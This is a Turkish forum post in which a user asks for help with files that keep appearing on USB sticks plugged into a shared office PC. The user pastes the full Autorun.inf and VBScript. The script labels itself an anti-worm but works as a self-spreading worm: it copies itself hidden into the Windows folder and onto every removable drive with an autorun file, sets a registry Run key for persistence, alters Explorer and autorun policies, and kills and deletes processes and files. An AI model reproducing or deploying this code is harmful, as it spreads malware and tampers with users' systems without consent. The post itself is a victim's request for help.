arkadaşlar iş yerşnde kullandığım (çok kullanıcılı) bilgisayara flash bellek taktığımda bellek içerisine direkt Autorun.inf ve M1K9H3A6.vbs isimli dosyaları atıyor psikolojim bozuldu kill_amvo_virus_usb_en.vbs'yu falan denedim düzelmiyor virüs taraması yaptım bir şey değişmedi ney yapabilirim yardımlarınızı rica ediyorum
Autorun.inf dosyasını not defteri ile açtığımda aşağıda yazanlar çıkıyor
[autorun]
ShellExecute = WScript.exe M1K9H3A6.vbs
M1K9H3A6.vbs dosyasını not defteri ile açtığımda aşağıda yazanlar çıkıyor
'This program is an Anti worm and will not get dammege to the computer
'----------------------------------------------------------------------
Dim InfectedFiles, InfectedDir
Dim FSO, Shell, To_File, Disk_Drive, Autorun, MF, MKH_RunDir, WinDir, in_WinDir, Text, MKHSource, Temp
Dim InF, RegPath, RndName, FilNam
InfectedDir = Array ("C:\" _
,"C:\Windows\" _
,"C:\Windows\System32\" _
,"All Drivers" _
,"C:\Windows\System32\Drivers\" _
,"C:\Windows\System32\DLLCache\")
' Array for the infected files
' InfectedFile, InfectedDirID, InfectedRegKey, Infectedram, "Family"
InfectedFiles = Array ("1THES92P.EXE" , 3, "0" , "0" , "0" _
,"2IFETRI.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"3WCXX91.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"4SV.EXE" , 3, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"4SV.EXE" , 2, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"AMVO.EXE" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"AMVO0.DLL" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"ASC3360PR.SCR", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.PIF", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.EXE", 3, "0" , "0" , "W32-Sality.gen" _
,"AVP.EXE" , 3, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO.EXE" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO0.DLL" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AWDA2.EXE" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"BGOTRTU0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"CAPP.PIF" , 3, "0" , "0" , "0" _
,"CDROM.SYS" , 4, "0" , "0" , "Win32/Protector.H" _
,"CDROM.SYS" , 5, "0" , "0" , "Win32/Protector.H" _
,"CKTTQN.PIF" , 3, "0" , "0" , "0" _
,"CKVO.EXE" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"CKVO0.DLL" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"COPY.EXE" , 3, "sqlserv" , "0" , "W32/SqlCop.worm" _
,"CTFM0N.EXE" , 2, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"DSETWEM0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"EJ10FKDO.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"GODERT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"GSIT.PIF" , 3, "0" , "0" , "0" _
,"HELP.EXE.TMP" , 2, "avpa" , "HELP.EXE.TMP", "W32/Sality.*" _
,"HNDCBM.PIF" , 3, "0" , "0" , "0" _
,"HOST.EXE" , 3, "0" , "0" , "0" _
,"HVLWLV.EXE" , 3, "0" , "0" , "0" _
,"IMAGE.EXE" , 2, "My App" , "IMAGE.EXE" , "0" _
,"IMAGE.EXE" , 3, "My App" , "IMAGE.EXE" , "0" _
,"KAMSOFT.EXE" , 2, "kamsoft" , "0" , "0" _
,"KAV.EXE" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO.EXE" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO0.DLL" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"L1.COM" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"LHGJYIT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"MINE.EXE" , 2, "0" , "0" , "W32/Injector.BDW" _
,"MMVO.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"MMVO0.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"N1DE2ECT.COM" , 0, "0" , "0" , "0" _
,"N68MQCRA.EXE" , 3, "0" , "0" , "0" _
,"NAR.VBS" , 3, "nar" , "0" , "VBS/Autorun.worm.k" _
,"NASY.EXE" , 3, "0" , "0" , "0" _
,"NIDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NLDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NMDFGDS0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "Generic PWS.ak" _
,"NTDEIECT.COM" , 0, "0" , "0" , "0" _
,"NTDELECT.COM" , 0, "0" , "0" , "0" _
,"O1.COM" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"OLHRWEF.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"OPTYHWW0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"PYTDFSE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"QALA.EXE" , 3, "0" , "0" , "0" _
,"QPHDIN.COM" , 3, "cdoosoft" , "CCSVCHST.EXE", "0" _
,"QXZV5.EXE" , 2, "0" , "0" , "Win32/Peerfrag.DR" _
,"QYQPLS.PIF" , 3, "0" , "0" , "0" _
,"RAV.EXE" , 3, "rava" , "0" , "PWS-Gamania.gen.a" _
,"RB.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"SCVVHSOT.EXE" , 2, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"SCVVHSOT.EXE" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"SYNCMAN.EXE" , 2, "syncman" , "SYNCMAN.EXE" , "0" _
,"TAVO.EXE" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TAVO1.DLL" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TJJQTEJQ.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"TT.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"UPDATD7.EXE" , 1, "0" , "0" , "W32/Kryptik.BQR" _
,"URET463.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"URRETND.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"USERINIT.EXE" , 3, "0" , "0" , "W32/Virut.n.gen" _
,"USB_RUN.EXE" , 3, "syncman" , "SYNCMAN.EXE" , "0" _
,"UWEYIWE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"WINDOWSAV.EXE", 3, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"WMSRVC.EXE" , 2, "0" , "0" , "W32/Injector.AZZ" _
,"X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XMG.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"XN1I9X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XYJOWL.PIF" , 3, "0" , "0" , "0" _
)
On Error Resume Next
RegPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.shell")
'Clone himself into any removable disk
in_WinDir = 2
Set MF = FSO.GetFile(Wscript.ScriptFullName)
FilNam = WScript.ScriptName
MKH_RunDir = FSO.GetParentFolderName(MF)
Set WinDir = FSO.GetSpecialFolder(0)
'---Open the drive just like autorun would if it is not running from the windows directory--->
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Shell.Run(WinDir & "\Explorer.exe /root," & MKH_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If
'---If file is in windir and not running from windir then write the registry run value and exit--->
If (FSO.FileExists(WinDir & "\" & FilNam) = 0 Or in_WinDir = 1) Then
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe" & FilNam
Set Text = MF.OpenAsTextStream(1,-2)
Do While Not Text.AtEndOfStream
MKHSource = MKHSource & Text.ReadLine
MKHSource = MKHSource & VBCrLf
Loop
If (in_WinDir = 0) Then
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(WinDir & "\" & FilNam, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
To_File.Attributes = 39
End If
'Generate the Script name
Randomize
RndName = "M" & Int((9 * Rnd) + 1) _
& "K" & Int((9 * Rnd) + 1) _
& "H" & Int((9 * Rnd) + 1) _
& "A" & Int((9 * Rnd) + 1) _
& ".vbs"
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe " & RndName
Do While (in_WinDir = 1)
'---Add Script and autorun to each Removable disk drive excluding floppies--->
For Each Disk_Drive in FSO.Drives
msgbox(Disk_Drive.DriverLetter)
If (Disk_Drive.DriveType = 1 And Disk_Drive.DriveLetter <> "A") Then
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\" & RndName, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 39
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\Autorun.inf", 2, True)
To_File.Write Autorun
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 39
End If
Next
'---Edit the registry to disable autorun--->
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\AutoRun",0,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\policies\Explorer\NoDriveTypeAutoRun", 255,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\policies\Explorer\NoDriveAutoRun",6710 8863,"REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveAutoRun",67108 863,"REG_DWORD"
Shell.RegWrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cu rrentVersion\Policies\Explorer\NoDriveAutoRun",671 08863,"REG_DWORD"
'---Edit the registry to disable hidden file properties
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\NOHIDD EN\CheckedValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\NOHIDD EN\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL L\CheckedValue", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL L\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\SuperHidden\C heckedValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\SuperHidden\D efaultValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\Type", "Group", "REG_SZ"
'---Edit the registry to Enable Folder Options And RegEdit and Task Manager
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"
'Clean the worms from the computer
For InF = 0 To UBound(InfectedFiles) Step 5
If (InfectedFiles(InF + 1) < 3) Then
If (FSO.FileExists(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF)) = True) Then
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF))
To_File.Attributes = 32
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF), 0, True)
End If
Else
For Each Disk_Drive In FSO.Drives
If ((Disk_Drive.DriveType = 1 Or Disk_Drive.DriveType = 2) And Disk_Drive.DriveLetter <> "A") Then
If (FSO.FileExists(Disk_Drive.Path & "\" & InfectedFiles(InF)) = True) Then
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & InfectedFiles(InF))
To_File.Attributes = 32
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & Disk_Drive.Path & "\" & InfectedFiles(InF), 0, True)
End If
End If
Next
End If
Next
WScript.Sleep(60000)
Loop
'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Temp = WinDir & "\" & FilNam
Shell.Run Temp, 1, 0
End If
End If
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"
Alıntı
